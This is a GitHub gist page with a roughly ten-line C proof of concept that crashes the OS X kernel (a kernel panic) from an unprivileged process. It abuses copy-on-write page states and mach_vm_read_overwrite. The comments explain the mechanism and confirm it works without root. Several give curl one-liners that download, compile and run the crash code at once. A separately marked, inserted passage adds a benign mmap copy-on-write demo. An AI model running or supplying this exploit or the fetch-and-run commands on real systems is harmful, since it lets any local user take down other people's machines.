Kernel panic in latest OS X in 10 lines of C
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>

int
main (int argc, char * argv[])
{
  /* volatile so the ++/-- pair below is really performed and not optimised away */
  volatile char * library;
  const mach_vm_size_t page_size = getpagesize ();
  const mach_vm_size_t buffer_size = 3 * page_size;
  char buffer[buffer_size];
  mach_vm_size_t result_size;

  /* Image 0 is the main executable; image 1 is the first loaded library.
   * Its pages are copy-on-write (COW) mappings of the file on disk. */
  library = (char *) _dyld_get_image_header (1);

  /* Make the second page of the image writable. VM_PROT_COPY asks for a
   * private copy on write instead of writing through to the shared mapping. */
  mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);

  /* Touch the second page: the write turns it from COW into a private page,
   * so the first three pages of the image are now [COW][PRV][COW]. */
  library[page_size]++;
  library[page_size]--;

  /* Ask the kernel to copy those three pages into our buffer. The read across
   * the mixed COW/private range is what triggers the panic. */
  result_size = 0;
  mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);

  return 0;
}
sbose78 commented Feb 20, 2015

Some code comments would help :(
evilsocket commented Feb 20, 2015

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writes at that offset and then tries to read the first 3 pages of the image into a buffer.

oleavr commented Feb 20, 2015

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).
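The page layout oleavr describes can be reproduced with portable POSIX mmap calls instead of the Mach VM API. The following is an added example, not code from the gist or from any commenter; it does not attempt the panic (that needs the Mach kernel's mach_vm_read_overwrite), it only shows how one write through a copy-on-write mapping turns a single page private while its neighbours stay backed by the file, i.e. the [COW][PRV][COW] layout. The names cow_demo and cow_result and the /tmp/cowdemo.XXXXXX scratch file are assumptions of this example, and it relies on Linux and macOS behaviour where untouched MAP_PRIVATE pages still reflect later writes to the file (POSIX leaves that unspecified).

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* For each of the three pages of the private mapping: 1 if a later write
 * through the shared mapping is still visible there (the page is still a
 * copy-on-write reference to the file), 0 if it has become a private copy. */
struct cow_result {
    int page_still_cow[3];
};

/* Hypothetical helper (not from the gist): map a three-page scratch file
 * twice, MAP_SHARED and MAP_PRIVATE, dirty only the middle page through the
 * private mapping, then write through the shared mapping and record which
 * private pages still follow the file. Returns 0 on success, -1 on error. */
int cow_demo(struct cow_result *out)
{
    const size_t page = (size_t) sysconf(_SC_PAGESIZE);
    const size_t len = 3 * page;
    char path[] = "/tmp/cowdemo.XXXXXX";   /* constructed scratch file */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                          /* the file lives only while mapped */
    if (ftruncate(fd, (off_t) len) != 0) {
        close(fd);
        return -1;
    }

    char *shared = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    /* volatile, as in the gist, so the ++/-- pair is really performed */
    volatile char *priv = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (shared == MAP_FAILED || priv == MAP_FAILED) {
        close(fd);
        return -1;
    }

    /* Seed every page through the shared mapping, i.e. in the file itself. */
    for (int i = 0; i < 3; i++)
        shared[i * page] = 'A';

    /* Touch the middle page of the private mapping (the gist's trick): the
     * first write to a MAP_PRIVATE page gives this process its own copy, so
     * pages 0..2 of the private mapping are now [COW][PRV][COW]. */
    priv[page]++;
    priv[page]--;

    /* Modify the file again through the shared mapping... */
    for (int i = 0; i < 3; i++)
        shared[i * page] = 'B';

    /* ...and check which private pages still follow the file. Page 1 keeps
     * its private 'A'; pages 0 and 2 show 'B' because they are still COW
     * references to the same page-cache pages (Linux and macOS behaviour). */
    for (int i = 0; i < 3; i++)
        out->page_still_cow[i] = (priv[i * page] == 'B');

    munmap((void *) priv, len);
    munmap(shared, len);
    close(fd);
    return 0;
}

int main(void)
{
    struct cow_result r;
    if (cow_demo(&r) != 0) {
        perror("cow_demo");
        return 1;
    }
    for (int i = 0; i < 3; i++)
        printf("page %d: %s\n", i, r.page_still_cow[i] ? "COW" : "PRV");
    return 0;
}
```

On OS X the same state can be inspected from outside the process with vmmap, whose region listing reports the share mode (COW versus PRV) of each mapping, which is a quick way to confirm that the dirtied page of the library really changed mode before the read is issued.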

kainz commented Feb 21, 2015

Does this require root to run?

jhorowitz commented Feb 21, 2015

@kainz No

workmanw commented Feb 21, 2015

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash

Bilge commented Feb 21, 2015

library[page_size]++;
library[page_size]--;

Am I being trolled?

bcho commented Feb 21, 2015

@Bilge No, these two lines are used to make the library dirty. See @oleavr's comment.

CoolOppo commented Feb 21, 2015

panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o $panickerPath -
./$panickerPath

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

steakknife commented Feb 23, 2015

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out

iskl commented Apr 5, 2015

The code does work!!! Awesome!!! Fantastic!!! Unreal!!!
